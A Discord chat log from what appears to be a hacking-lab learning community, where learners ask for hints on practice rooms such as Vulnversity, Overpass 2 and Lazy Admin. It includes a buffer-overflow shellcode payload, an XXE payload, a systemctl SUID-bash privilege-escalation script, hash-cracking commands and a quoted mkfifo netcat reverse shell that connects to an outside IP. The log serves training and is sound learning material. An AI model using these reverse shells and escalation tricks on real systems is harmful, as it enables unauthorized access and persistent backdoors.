#room-hints

have you tried that?

I am trying that now

Also stick to one channel at a time in future

i told him to come here since he only wanted a hint 🤓

Also stick to one channel at a time in future
@final mortar

Yes sorry Someone told me that this one wold be better

I did say "in future", but ok

Yes sorry Someone told me that this one wold be better
@eager folio Yeah, it's all right. If you are not sure about something in future, read the desc 🙂

yes sorry

is it ok to give the ip address of the server i am working on here or do i have to hide it ?

Nothing to apolize for

is it ok to give the ip address of the server i am working on here or do i have to hide it ?
@eager folio It's all right

dont know what else to try in my request....
@eternal brook guys anyone really stuck?

I get that when I try to connect

is ssh running on port 22 ?

yes

I might not have used the right username actually

Wrong username = connection closed

is ssh running on port 22 ?
@final mortar that would be connection refused, rather than closed

Ok so I tried every username. The only one that asks me a password is root. But the problem is that I never had to find a password in the room before... I don't know why I can't understand what is asked and I start feeling dumb

You're not meant to be asked for a password

Did you read the file on the share?

It gave you some names

Unix usernames are always lower case

Do you mean "Working From Home Information.txt" ?

I am reading everything again and I am on it now, there is no username giving in this file, am i supposed to find one using the names ?

Ok it was it

thnak you for your help

I have had a lot a difficulties for something pretty easy at the end, sorry for the trouble on such an easy thing

no sorry necessary, just learn from the experience

I'll do

a

can anyone help me with buffer overflow ?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

i am doing binex i ve found that i can overwritten the rbp which i think is the return adress after a called fucntion finish, so if i can write my shell code in the stack and make rbp points to an adress in the stack which is the start of my shellcode would it work or should try smth else

i am trying to learn more on binary exploitation

that sounds good to me

there are some great rooms to learn binary exploitation and RE

yeah i ve seen that tryhackme has a lot of binary exploitation rooms which is good for me to learn

I'm stuck at Task 2 - /room/scripting. I'm just trying to make a basic connection to the port and waiting for a response but nothing happned. Running nmap to make sure what ports are open gives me this:

given that the task talks about 3010 I'm assuming this is where I want to connect

import socket, sys

if len(sys.argv) != 3:
    print("Usage: python3 socket.py [ip_address] [port]")
    sys.exit()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((sys.argv[1], int(sys.argv[2])))

print("Connecting to " + sys.argv[1] + ":" + sys.argv[2] + "...")

try:
    message = '1'
    print('sending ' + message)
    s.sendall(message)

    amount_received = 0

    while amount_received <= 1:
        data = s.recv(32)
        amount_received += len(data)
        print(': ' + data)

finally:
    print("Closing...")
    s.close()

and for some reason yesterday this script was working. I only changed the hard coded port to int(sys.argv[2]) and for that I started getting this:

i'm so lost

you're giving it a string, it doesn't take strings as an argument

either encode it or make it a byte object before sending it

Byes objects are b'

ok now i'm really confused

http://<machines_ip>:3010 this page wasn't working yesterday

unconfuse thyself

alright now that I can see the page do I need to code so the script gets the html data?

havent done that specific room so i dont actually know what you need to do

I'm assuming I have to send HTTP headers

i ve written this 3 offset = 608
4 rbp_value =b"\x78\xe0\xff\xff\xff\x7f\x00\x00"
5 shellcode = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f \xb0\x3b\x0f\x05"
6 payload = b"x\90"*(608-len(shellcode)) + shellcode + rbp_value
7 print(payload)

but rbp values has 0x395c5c7830395c5c instead of the rbp_value

0x395c5c7830395c5c has some \x90 but in a string format

I just don't get why some tutorials on sockets don't need to encode. And it actually worked for me yesterday without doing it (or didn't and it didn't work because of that)

Might be different versions 🤷‍♂️

but anyway it works now, now I just need a way to make it functional

Hey, for the brooklyn 99 room, i completed the room with 2 differents ways , but i find there is a third created user "amy" there is a third way to get inside the room thats involved such user?

Hey, Im doing the alfred room and I have switched shells but I am unable to input any commands and it is just blank

Have you pressed enter a few times to make sure the prompt is there?

(also screenshots would help)

Yeah ive tried it

Working on the ss now

Thanks :D

Gotta transfer it from a vm and its taking its time

You can open discord in the browser of your vm ;)

Yeah I was just avoiding it because id have to sign in

Yeah I understand

probably should cover the info to be safe but oh well

VPN IPs and Machine IPs are safe here!

Figured they would be

but never know

Any suggestions?

The payload isn't the one you selected

You tried to use the windows/meterpreter payload but that one has used the generic/shell_reverse_tcp

ah okay

Fixed now thanks a lot

:D

what is wrong with this? Am i being dumb or something?

.\launcher.bat

Still on PS Empire, i got the file across

no way

dont

uh

nah same result

It's not a linux terminal.

. doesn't mean anything in windows

yeah so i did the full path

Oh shoot thats for meterpreter

c:pathtofile

i tired it all anyways

Do you have meterpreter session?

Are you sure the launcher.bat is in the same directory as you

i dont

and are you sure you typed the full path correctly

I'm sure to use .\ you need to be in a meterpreter session

i dont have meterpreter

i think you're right though

Type the path and name of the batch file, and press Enter: C:\PATH\TO\FOLDER\BATCH-NAME.bat

What's the contents of launcher.bat

Its for empire

it's a listener

it looks like something got messed up in there

because it's echoing out errors from the commands ran in the launcher.bat

anyone know why this python code doesn't print "test"?

Any errors @green prism

nope it just hangs

it prints just before the while loop

what is that

symbol

Probably can't get the connection

=/=

ah yes fira code

Not equal to

https://github.com/tonsky/FiraCode

@trim haven Yes, I know... but I mean, is it the actual syntax of the language?

I'm sure it would error if it was an issue @white salmon

Let me test

oh im dumb

i had 2 files and i was editing one and running the other

Oh haha!

Happens to the best of us

@white salmon See it errors if it can't run it

And as it was hanging it wasn't the issue

As I'm sure an1me has it installed

Yes, I didn't know about Firacode

so thank you

<3

sorry if I interrupt somebody but why doesnt it execute even tho I run it as sudo

You're not executing it

./filename to execute it

You're checking the permissions of it

wrong screen

w8

Okie

now

You're still not running it.

i run chmod

That's not running it

chmod changes the permissions of the file.

yaeh

ls states information about the file

thats why i checked them with ls -l

You're adding a SUID binary too

i want to set suid

Right, please re-read what Jabba said earlier.

on how to run/execute files.

i do not want to execute it

(btw the SUID binary hasn't been set)

sorry if I interrupt somebody but why doesnt it execute even tho I run it as sudo

Also why are you trying to add an SUID binary to it

He was asking why the chmod doesn’t execute

run the command i inputted which clearly says chmod

James answered you earlier

Oh you need root perms

You need to physically be the root user

u+s

w0t

I thought he tried that already

yeah

All I see is +s

i tried u+s as well

but not on the screen

Just do chmod 755

(btw the SUID binary hasn't been set)
@trim haven wdym ?

ignore that

Also why are you trying to add an SUID binary to it
@trim haven I want to try to escalate privs on my own system since I am not capable of doing so on Vulnversity

I don't want to help you

But have you run the file?

well

I used a bash script

so technically yeah

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Okay so

This is a little buggy

The systemctl sometimes plays by it's own rules

So you have to play around with the way you're getting the information you need

hm ok

@tidal sedge

Also, I dunno if you can actually put the SUID bit on the regular systemctl binary

From what you just pasted, I can tell you're trying to use the GTFOBins exploit for systemctl

and if you read, it says to make a local copy.

sudo sh -c 'cp $(which systemctl) .; chmod +s ./systemctl'

He's doing it on his Kali machine for some reason 🤔

🧐

right yeah, it's weird but

¯_(ツ)_/¯

Then this doesn't belong in #room-hints

@hollow fox You've been doing it wrong the whole time, please re-read gtfobins.

and follow the instructions

ok

I dont get it

but I also modified the payload

Then this doesn't belong in #room-hints
@tidal sedge but in ... ?

@white salmon

#general

I was sent here from #general

That’s cuz they thought you were talking about a specific room

They were wrong

Are you doing this for a THM room, or are you just trying to learn how to exploit your own machine?

If it's the latter, then sorry, it belongs in #general

I am doing it for vulnversity

so a room

but I thought it maybe does not work bc of the shell cuz its nc so I tried to replicate it on my own machine

That won't work

Most exploits on machines are purposely set that way to be exploited

E.g. outdated versions

Technically the method he's trying to use could work on his own machine (if he hasn't touched the default Kali perms or anything)

since it's only merely abusing sudo privs

but you'd be getting root on your own machine (and creating a dangerous backdoor)

You have to perform the exploit on the Vulnversity machine.

is it a deal since I am not exposed to the internet ?

it'll work- you're just doing something wrong probably

yeah prolly

You're exposed to the internet when you're working with THM

Oh I thought I am in a seperated Vlan

well

you're generally safe, but it's good practice to not leave random exploits in your machine and stuff

yessir

how do I do this code theme in dc

the box around the code so it doesnt look ugly in dc

ykwim ?

https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline-

@hollow fox

thanks bud

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF```

so I pasted this in the shell

and it doesnt execute ExecStart

even tho there is /bin/systemctl enable --now

Again.

you didn't read the instructions clearly

It says to make a copy of /bin/systemctl

and then to give that copy the SUID bit you've been struggling with.

why that ?

sorry if I seem dumb or some shit

but it already has suid set

I dont get why I need to make a copy

You're not meant to copy it for vulnversity

Also possibly ^

GTFOBins isn't a deus ex machina- it needs specific conditions.

and only if those specific conditions are already met- then you can exploit whatever it is to privesc

hm

If you're still stuck, there's a lot of writeups for Vulnversity that you could research on and see if you can find out the best method for what you're trying to do.

but to exploit systemctl I need to write a service by myself right ?

that basically does anything but with root prevs (bc of suid)

right ?

That's what the GTFOBins one does, it gives you a shell

I tweaked around the payload several times but didnt execute once

Probably shouldn't be playing with the payloads.

makes sense

but i dont know what else could cause this issue

https://tryhackme.com/room/networkservices | Task: 7 | question #6 : I try the command: "sudo tcpdump ip proto \icmp -i tun0" and it returns: "tcpdump: tun0: No such device exists
(SIOCGIFHWADDR: No such device)"

How do I know what I have to put to replace tun0 on my config ?

please

Which machine are you running the command on?

kali

Are you connected to the VPN?

or is this the in-browser Kali VM?

yes

no it is my own VM

Are you connected to the VPN inside of Kali*

Do you see a tun0 when you type ip addr

I have my VM working on my Windows 10, connected to the vpb

vpn

oh, so OpenVPN is running on your regular windows desktop?

yes

That's incorrect- OpenVPN should be running inside of the Kali VM.

ipaddr doesn't exist

you'll have to disconnect from OpenVPN on your windows computer, and run it on the Kali VM

ohhh i didn't know

thank you

thanks it works now

sorry but I have a lot of difficulties tonight...:

for question #6

it says that

you have to replace [local tun0 ip] with your tun0 ip

lol ok

what is it EDIT: Might have found

||Anyone could help me with reverse shell on mr.robot box? I am using https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php for the 404 appearence and nc -lvnp 4444 to get the shell. But nothing happens. I open /404.php or any fake page on the host and nothing happens as if it wont trigger. I have set tun0 ip to the reverse shell script||

mrrobot room

@graceful magnet why don’t you change the page to something else first to confirm you can change it properly?

i had listened to wrong port

with nc :|

👀

Hi i need some help ( Networking Room ) to find second common private home range?

I entered but still giving me not correct

Google it 🙂

A - 10.0.0.0/8
B - 172.16.0.0/20
C - 192.168.0.0/16

@Korone Gang I did but still giving me not correct

format asking me to her " xxx.xxx.x.x so it should be C address but giving me its not correct error

oh boy it's one of those questions

lemme see here

Well if the first one is 0.0 maybe the value for the second one is slightly different

first home default range is correct : 192.168.0.0 but the second format xxx.xxx.x.x no getting anything

you can find the answer you're looking for on google btw, it's a little hard to hint

try incrementing the third octet

Remember, 192.168.x.x is the most important part

the .x.x allows a much larger number of (sub)networks and machines just from those two separate octets

Typically, /24. That means the last octet varies for a network.

So what's the next network along from the first answer

any hints for Ra2 yet? found a bunch of stuff that looks interesting, but i'm having no luck with getting an initial foothold

Anyone on here good for a hint on Hackpark, task 4, question 3. Ive found the service & confirmed it with walkthroughs but my answer keeps getting rejected...Any clues?

The answer was changed because it was wrong

You want the service name as given by sc query

Thanks!

Guys, in 'Lian_Yu' I'm stucked after finding the hidden directory || /island/2100||. I really don't know what I should do and the hint tells me nothing. Help plz 😋

can i confirm with anyone about anonymous-playground intended way. Just to confirm

sure

can someone give me a nudge in the pokemon room priv esc part

just a hint pls

guys

at blaster

nothign there?

nothign there?
@honest yew ||taskbar browser right click on it ||

nothing

theres just one browser

nothing
@honest yew ||right click on the browser ||

theres just one browser
@honest yew yes that browser

?

?
@honest yew ||reopened last session||

nothing

let me send a screenshot

Read rule 13

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Is anyone available to give me some advice in approaching the beginner path scripting task 2 gotta catch em all

Is the task going to each webpage getting the data @verbal barn

yes it is, i have got a socket connection to first web page but unsure on how i am supposed to get the data to analyse it

Uhh off the top of my head I don’t know how to do it with sockets

But I used requests as it was much easier

aww ok, so its not set in terms of approach

i am free to try other methods, never covered socket at uni, and the documentation wasnt that helpful

Mhm the task does say sockets

But in real life you won’t always use the common way

I’d recommend to research “BeautifulSoup” and “Requests”, if you’re set on using sockets, i can try and guide you but you’ll have to give me a few minutes to look at the docs

thanks man, ill give the research another go

:)

got the page sorted just gonna try the soup to identify the tag with the next port link

Need hint it Anon Playground v2 stuck after getting access to zYdHuAKjP

🙂

Rule 13 @idle ruin

^ the room was just released so there won't be any hints/help for a while

only 8 users finished it so i'd hold with asking for help/hints

where to find the request with the set-cookie header in the burp suite room

anyone?

hello i'm having problems with task 21 from the room learn linux. i've already read the write-up for this room and the answer seems to be more simple than what i'm making it out to be. i've tried to make an environmental variable in two different places but none of them seem to run when i try to execute ./shiba2. anyone have any ideas?

Sometimes the permission denied is a bug from messing up before-hand. Terminate the machine, re-deploy and log in as shiba2. Perform the task again, make sure you're not touching a file called $test1234 as it is not required. If there are any more issues ping me :)

@trim haven thank you for helping 🙂 i've already tried that and this is the full screenshot to show i've terminated the previous tries and redeployed a new one

Do you mind if I dm you? I'd rather not spoil anything here

sure, thank you

Can I have a hint in here https://tryhackme.com/room/ctfcollectionvol1
Challenge # 17 Sounding QR
I already made the sound very slow but still speech to text cannot guess it even myself haha

any hints?

hard to know how to hint on it @amber grail

@honest yew Have you solved it yet ?

If not I can provide you the cve you are looking for in the history

Can I have a hint in here https://tryhackme.com/room/ctfcollectionvol1
Challenge # 17 Sounding QR
I already made the sound very slow but still speech to text cannot guess it even myself haha
@amber grail It's not that hard really. I can tell you that it says two words , and the last word is 2 letters

Can I have a hint in here https://tryhackme.com/room/ctfcollectionvol1
Challenge # 17 Sounding QR
I already made the sound very slow but still speech to text cannot guess it even myself haha
@amber grail There are some audio transcription sites, can help you...

got it

thanks

Awesome

Not really asking for a hint, just need to be pointed in the right direction on where I can learn about https://tryhackme.com/room/vulnversity privilege escalation task. I guessed at the correct SUID file that looked suspicious, but I don't know why it was suspicious and I know I need to change an environment variable, but where should I be looking to learn something like this?

@elder sand Linux enumeration scripts and just general snooping of possible hidden files used by users

you'd be surprised at how people try to hide text files and stuff purely through obscurity

@white salmon would an enum script get me access to root files such as the root flag?

No

Enum scripts look for things on a system that could be possibly used for privilege escalation :3

some of them it depends, you should google them see what you can find

That's what I figured. I was just wondering a good place to learn this sort of privilege escalation?

Payload all the things might help

but there are automation tools such a linPEAS and winPEAS

Thanks! I'll take a look at these

@elder sand I just completed that one, I will say, I wouldn't have known about part of it, without the help of the walkthrough. I realized the one to go for, but didn't realize how to build it. Don't feel bad if you need to use a walkthrough, if you learn 🙂

smashing my tiny brain against the Anonymous Playground 😄 good stuff on this one 😄 every time I think I found something new, it makes even less sense

it's a fun room

no hints yet, though. rule 13

aye

should be venting on the general chat instead lol

@untold tartan yeah I looked at a few, just need to understand these techniques so I don't have to rely on a walkthrough.

@elder sand if you find something that helps outline that, share if you don't mind, because I had no idea it was possible >.>

I mean, I guess I did, just not the use in privesc

@untold tartan will do

Hrmm, working on the anonymous playground, it's... Yea.

Please bear in mind it's a new challenge room, and avoid discussing it here 🙂

Gotcha

hi can some help me in steel mountain

I recommend just asking the question straight away, rather than asking if anyone can help

i finished the box i just cant understand this Take a look at the other web server. What file server is running?

this question

Http File Server but it says incorrect

It wants the name of the product

You found it for the metasploit module

alright gotcha

woah finished it

thanks @stuck fractal is there any box that goes around windows ?

Go to hacktivities

Type in "Windows"

like learn linux

Not yet

ahh k

Hey guys.
In this linux challenge I am at question: Find the user which is apart of the "hacker" group and read flag 36.. But I dont understand that question. Know whats in the group file but what does this is apart of the "hacker" group mean?

Are you familiar with groups on Linux?

If not, I recommend researching those.

kind of. u have user, groups and others

No, that's file permissions

and groups represent anther level of rights

Please go and research Linux/Unix groups

ok

so there is more to it then just permissions

haha found it.

a little bit around the corner thinking. but yeah. ||look for a file owned by that group|| did the trick

james can i dm u about privlage escalation on overpass2 i already did it just to confirm that was the intended way?

The intended way is fairly obvious?

Like... Should be staring you in the face once you log in

guess I used an unintended way too 😅

DM @white pike @solid patrol

Stuck on the final stage of Anonymous Playground 2. It definitely highlighted my need to understand R2 better. Yikes.

Hi, please don't ask for help or hints yet as it's still a new challenge box

I'm not asking for help, just making a comment. No worries.

Then I'd recommend a different channel really

I just won't make comments, really.

hey @steep jetty can i dm you regarding anon playground

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Guys can anyone help out with a lil trouble ? What to do in case msf tells to forceexploit ?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Well am in bolt CMS and the maf exploit throws an error

Then you might be using the wrong exploit

Na am sure about the exploit because there was a check box about the exploit

Then I'd recommend checking your settings

And your VPN

Ok.....

Also how do we find the cms version ?

Nmap didn't help

Enumeration

Well there is a reference but it's incorrect

This exploit is available only for the latest version

Hence the cms should be the same version as well

But it isn't taking that as an answer.

Wat

It's definitely not the latest version

Yes it is

anyone around done jigsaw 2?

have a specific question

please

@shut pollen if you're talking about bolt I ended up bruting it

The answer is literally on the page

Bolt does not require brute forcing in any way.

on bolt? I missed it then

Yeah it's there

but lets be honest it took about 5 guesses and only cos its higher than I would have expected

But msf won't let me have a session

so anyone for jigsaw2?

Well, if the exploit is for "the latest version" then it's not going to be the right one @shut pollen

what is your question?

and it might be better to ask in #room-help if you want more than a hint

well I am pretty sure I know what to do but I tried every combination and nada

The port knocking is broken on THM I believe

You need to get the vulnhub one

even that isnt working ....

have both running at the moment

tried udp ..... too

What's the username for bolt || admin || or || jake || ?

Try everything

Yeah did that

If none were good then reread, it's there
You'll find it so obvious when you got it xd

I got the username

[] Started reverse TCP handler on <My IP>:4444
[] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target is not a Bolt CMS application. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

It's definitely not the latest version

This is the issue

It's not being detected as bolt, so something is wrong here

Check your settings

Check your VPN

anyone prepared to check syntax on jigsaw2 with me just incase I have missed something though I have tried various tools for the job

If it was supposed to be done with metasploit... then how th did I finish the room?? o-o
Used a lower version than the room's CMS

Update your metasploit

It works just fine

@gaunt herald exactly what confused me about the cms version question.... (not spotting it on the page)

It's there, if you keep looking

not going back to it 😄 the whole box took like 20 minutes

Metasploit is updated man.

There's really nothing wrong with the room

Also , How did you get the CMS version ?

Must be my connection somehow.

By enumerating harder

definitely nothing wrong with it

Nothing Good Today

8-2

Hence the cms should be the same version as well
@shut pollen might wanna check everything again and pay attention to the web page 👀

Okay man

Got the flag , still need the version

Have you found the username and password?

Because if you have maybe you can use them somewhere on the website..?

Yeah

Hello everyone, I'm kind of stuck on this room:

https://tryhackme.com/room/networkservices

task 4 step 8

@shut pollen Sometimes CMS users don't change default directories......

I'm able to connect to the smb service, however I'm not able to copy the .ssh directory on my local computer.

Are you using mget

Once I connected, I tried these commands:

smb: \folder> recurse ON
smb: \folder> prompt OFF
smb: \folder> lcd /local/source/directory
smb: \folder> cd remote/target/directory
smb: \folder> mput *

where the \folder\ is .ssh\

None of those will get the files

Try looking at the documentation

Or use the help command

are these not to copy the files?

Do any of them pop up with a message saying Do you want to copy these files or something similar to it?

Nope

I want just to be able to download the folder in my desktop

Well you're using the wrong command

I just tried your suggestion, typing " mget .ssh ~/Desktop"

all you need to do is go to the folder that has the things you want do download

and type mget [File Name]

where the files are copied?

I mean pasted

To the directory that you ran the smb command to connect

ah, I see

@trim haven Thank you

yw

The privesc on Overpass 2, little hint I literally have no clue where to look

ls -lAh ~ @trim haven

That's a funky command, thanks I'll have a look

It's just ls -lah that excludes . and ..

Hi im doing the zth room

when i submit xxe payload it says sorry, already taken

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY hack SYSTEM 'except://id'>]>
<root>
<name>aaa</name>
<tel>a</tel>
<email>&hack;</email>
<password>&test;</password>
</root>

need help on both

It's mentioned the the above paragraph 🙂

Read carefully

hello there is anyone

someone will help me

room Tartarus-Remastered

- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done```

Please 🙂 as I said in room-help

I have already done with nmap , gobuster, ftp

What exact step/task are you stuck at

I am stuck at the root flag question in the room "Overpass 2 - Hacked". I located the suid_bash binary but can't find a way past that. Any hints?

You can use that

There's just something you need to know about bash and suid, which you can find really quickly online

Thanks @stuck fractal

What date did Lola first start her photography? Format: dd/mm/yyyy

Is this buggy?

https://tryhackme.com/room/25daysofchristmas task 10

no possible answer fot that

No it's not buggy

You need to do some maths

There's 2019 years worth of possible answers really. Or at least 1000 if you don't want to zero pad the year

any ideas where to look after doing scan on anonymous room

Guys how do we crack sha256 with John ?

*salted 256

Sounds like a googleable question

I did , couldn't find something of avail

Which room are you doing rn

Overpass2

I did it with hashcat, I can tell you that way if you want

still you can find about jtr online, i just did

hash:salt > write in this format in hash.txt

hashcat -m 1710 -a 0 hash.txt rockyou.txt > then this command

Thanks @wraith tapir

^

Thanks @wraith tapir , I did it with john

I would like to know how tho, not very good with john

You save it in the format pass$salt

Then you use john --wordlist=/usr/share/wordlists/rockyou.txt --format='dynamic=sha512($p.$s)' toJohn

||room:ccpentesting task7.6 How do you show options in a specific category in metasploit? cant figure out the right command, I always thought it was 'info' but appearently it isnt||

||show options||

think of how that command works

hmm ok, thanks

Then you use john --wordlist=/usr/share/wordlists/rockyou.txt --format='dynamic=sha512($p.$s)' toJohn
@shut pollen trried this but didn't work....

hashcat -m 1710 -a 0 hash.txt rockyou.txt > then this command
@wraith tapir also tried this one too and it's still didnt work

same problem here

@hollow arch for hashcat store the password and salt, in that order, separated by a colon (:) and use the command hashcat -m 1710 hash.txt /path/to/rockyou.txt

I also tried using the backdoor to get access to the machine and it's just stack....no command works

Is this overpass2 tr0x01?

Is this overpass2 tr0x01?
@trim haven yeah

You can't crack the hash?

I also tried using the backdoor to get access to the machine and it's just stack....no command works
@hollow arch you get the salt from the source code

Both the salt and the hash method are in the source code

Cult don't give answers please

yeah

The link is an answer ;)

Thanks <3

Yeah

hey guys I am doing Lazy Admin challenge. I need to elevate privileges for the root account but I am ```$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Can you guys give me a hint
in addition to the creds I have a backup file on another account's home folder.
```#!/usr/bin/perl
system("sh", "/etc/copy.sh"); #it is another reverse shell
---------
#copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
``````ps aux | grep mysql
mysql      954  0.0 10.8 546408 47248 ?        Ssl  12:12   0:05 /usr/sbin/mysqld``` I think since mysql isn't running with root's privileges it isn't possible to elevate privileges from that

Hi I am a bit stuck on room:metasploit task:5 #7

I have tried all the numbers.

I think you need help for this one you don't need hints

OK thanks

@unreal lake What's your issue..???

@unreal lake "What is the name of the column on the far left side of the console that shows up next to 'Name'?"

I got it, I just brain farted.

Thanks for your time guys

@unreal lake think i got caught out on it also 😉

Over thinking the question haha

hey guys I am doing Lazy Admin challenge. I need to elevate privileges for the root account but I am ```$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Can you guys give me a hint
in addition to the creds I have a backup file on another account's home folder.
```#!/usr/bin/perl
system("sh", "/etc/copy.sh"); #it is another reverse shell
---------
#copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
``````ps aux | grep mysql
mysql      954  0.0 10.8 546408 47248 ?        Ssl  12:12   0:05 /usr/sbin/mysqld``` I think since mysql isn't running with root's privileges it isn't possible to elevate privileges from that

can you give me a hint

Did you try and see if there’s credential reuse?

Or if you could overwrite the reverse shell that’s there?

need hint on anonymous flag2 anyone

Did you try and see if there’s credential reuse?
$ cat /etc/passwd | grep rice I think that is what you mean. It outputs nothing.

I will try to connect and dump the contents of the database. I am having a technical problem atm be right back

That’s not what I meant

Passwd file doesn’t hold any credentials so that wouldn’t find anything even if there is credential reuse

I mean just try switching users with that password and see if any of the users are using it

Did you check your Sudo permissions as well?

can I get a small hint on the privilege escalation process of the "Daily Bugle" machine? currently im the "Apache" user and I've tried:
-Seeing sudo permissions (sudo -l)
-SUID files
-SGID files
-Processes/Services running (at best of my ability, as im new to linux I rarely know what is suspicious or not)
-Trying to login with the found and common passwords on the other users
-Checked the cron jobs (none sus running)
-Checked many folders for uncommon files
-Kernel known exploits

My current and only lead is the SMTP server and some hash I found on the mysql database (got the credentials from the joomla configuration file), but it feels like im chasing down the rabbit hole as none of those leads are leading nowhere.

Did you check your Sudo permissions as well?
@oblique cliff ohhhhhhhhh I wasn't in the sudo group so I thought to myself there is no need to check for sudoers.

Thank you I got root 🙂

Usually users aren’t in the Sudo group. But you should always check your Sudo permissions anyway 🙂

No problem

can I get a small hint on the privilege escalation process of the "Daily Bugle" machine? currently im the "Apache" user and I've tried:
-Seeing sudo permissions (sudo -l)
-SUID files
-SGID files
-Processes/Services running (at best of my ability, as im new to linux I rarely know what is suspicious or not)
-Trying to login with the found and common passwords on the other users
-Checked the cron jobs (none sus running)
-Checked many folders for uncommon files
-Kernel known exploits

My current and only lead is the SMTP server and some hash I found on the mysql database (got the credentials from the joomla configuration file), but it feels like im chasing down the rabbit hole as none of those leads are leading nowhere.
@white salmon heya did you try to crack that hash?

I did

Thank you for the detailed message of what you tried 🙂

Were you able?

no

tried with hashcat

I know its a Mysql5 hash

Im gonna try again in case I messed the command

Look over your linpeas output more closely

@white salmon

Can someone dm me for anonymous playground i need some help for python script and i’m not sure what i should do

Ok thanks I'll do that @oblique cliff

(I was actually doing that rn for the 3rd time kek)

There should be interesting stuff there

i feel really stupid right now, have all answers for googledorking room, except for Task2 Question1 about crawlers, any hint on that lol

If I remember correctly the answer is in the blurb in the beginning of the task

ah lol found the one word i had not tested yet 🙂

hey guys

I'm currently on the Owasp Juice Shop Room

I just got to Task 5, and I have no clue how to solve it

I know I could look for the answer online, but I was hoping to first get some hints before I try that

I am quite a beginner, so sorry if the answer is easy, but I have no clue on how to go about doing this.

@wind fog the hard part of that question is finding jim identity

Yeah, who is Jim though, we're never told anything about him

no email, no nothing

the difficulty of finding his identity depends if u watched movies like star wars, star trek...

IIRC don't you have to use LFI for that task?

Star trek? What's that got to do with this?

¯_(ツ)_/¯

hmmmm 🤔

Any hint on how to start though?

research everything jim posted then relate to my hints

And what's his email? How do I find that?

you need to enumerate the database

you dont have to go that hard to find jim identity just read the comments on the articles posted

ermmm

enumerate the database?

oh wait that bit might come later but you have to look around for info on Jim

yes christ

I tried looking at a walkthrough online

what the hell is any of this stuff?

the difficulty went from 0 to 100 in about 1 task

Yea this room is kinda difficult

tbh finding jim identity hasnt to do with technical skills

but with research skills

wdym, like on google?

yes

or can I find it on their site?

if you saw jim comments and related it to star trek

all you had to do was

search

"jim star trek"

what jim comments are you referring to?

on the articles

articles?

click on a product

there was an even more evident way thought the administration page, which pointed jim address to some place on another planet

ah, thanks for the hint dude

let me take a look

okay, I am stuck on hackpark, task 4 question 3, ( i have completed the whole box flags in all ) however the phrasing on : abnormal Service : is screwing with me

ive tried putting this in every way i can think of and its not accepting it. am i missing something obvious

need nudge on Anon Playground v2, found ||hidden webdirectory|| now, enumerate, bruteforce ?

You want the name as returned by sc query @white salmon

EXE name != Service name

@keen willow What are you brute forcing

oh god dammit

lol

???

sorry my b

@keen willow What are you brute forcing
@verbal wedge nothing, but asking to, maybe ||ssh with potential users (operatives)||.

good idea

@white salmon Don't use that word here, it's a slur.

@wind fog Please change your username to something more appropriate for an educational environment.

good idea
@verbal wedge really ? they are 20 and what dict to use rockyou ? god my pc would kill me/

alright

name changed

@white salmon Don't use that word here, it's a slur.,
lesson learned, I apologize just re-read through the rules. Ill be more cautious next time.

Thanks

Can i have a hint too on Anon Playground v2? Been thinking of a lot of patterns that makes "zA->a" work but no luck yet...

Hi @steady stratus I am doing malstrings room , I have completed all but Task2 #1 & #2 can you please give a hint , Thanks

Can i have a hint too on Anon Playground v2? Been thinking of a lot of patterns that makes "zA->a" work but no luck yet...
@mint parcel you got initial foothold ?

@keen willow not yet

Hehehehe

Spooky is so evil

@keen willow not yet
@mint parcel i am right behind you, i guess.

🙂

yeah lol, already 3h thinking about this translation

Good luck!

"Try harder" i guess 😆

You got this

Strings are values such as text, there's a lot of gibberish like @.data or SVWP like in the screenshot

Look for values that form words and sentances @gritty pond

any hint on Anonymous. i got Secret string. Any help what to do with it and next. Tried some replacement but not working

"Try harder" i guess 😆
@mint parcel Can you see a pattern in both the strings , ||lowercaseUppercaselowercaseUppercase................. ||

